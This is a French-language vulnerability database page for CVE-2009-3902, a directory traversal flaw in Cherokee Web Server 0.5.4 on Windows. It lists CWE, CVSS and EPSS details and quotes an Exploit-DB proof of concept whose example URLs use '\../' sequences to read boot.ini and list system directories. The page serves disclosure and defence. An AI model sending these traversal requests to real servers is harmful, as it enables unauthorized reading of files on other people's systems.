CVE-2009-3902 : Détail

CVE-2009-3902

Directory Traversal
A01-Broken Access Control
5.68%V3
Network
2009-11-06
14h00 +00:00
2017-08-16
12h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Directory traversal vulnerability in Cherokee Web Server 0.5.4 and earlier for Windows allows remote attackers to read arbitrary files via a /\.. (slash backslash dot dot) in the URL.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 5 AV:N/AC:L/Au:N/C:P/I:N/A:N nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 9873

Date de publication : 2009-10-27 23h00 +00:00
Auteur : Dr_IDE
EDB Vérifié : Yes

############################################################ # # Cherokee Web Server <= 0.5.4 Directory Traversal Exploit # Found By: Dr_IDE # Tested On: Windows XPSP3 # Download: www.cherokee-project.com/download/windows # ############################################################ - Description - Cherokee Web Server <= 0.5.4 is a Windows based HTTP server. This is the latest version of the application available. Cherokee Web Server <= 0.5.4 is vulnerable to remote directory traversal attack by the following means. Default webroot is C:\Program Files\Cherokee\www [3 levels deep] adjust accordingly. - Technical Details - http://[webserver IP]/[\../] http://172.16.2.101/\../\../\../boot.ini http://172.16.2.101/\../\../\../WINDOWS\SYSTEM32 <- Full Directory Listings through Browser http://172.16.2.101/\../\../\../WINDOWS\SYSTEM32\calc.exe <- File access in context of web browser instance #[pocoftheday.blogspot.com]

Products Mentioned

Configuraton 0

Cherokee>>Cherokee_httpd >> Version 0.5.4

    Microsoft>>Windows >> Version *

    Références

    http://www.securityfocus.com/bid/36874
    Tags : vdb-entry, x_refsource_BID
    http://osvdb.org/59588
    Tags : vdb-entry, x_refsource_OSVDB
    http://secunia.com/advisories/37183
    Tags : third-party-advisory, x_refsource_SECUNIA
    http://www.vupen.com/english/advisories/2009/3091
    Tags : vdb-entry, x_refsource_VUPEN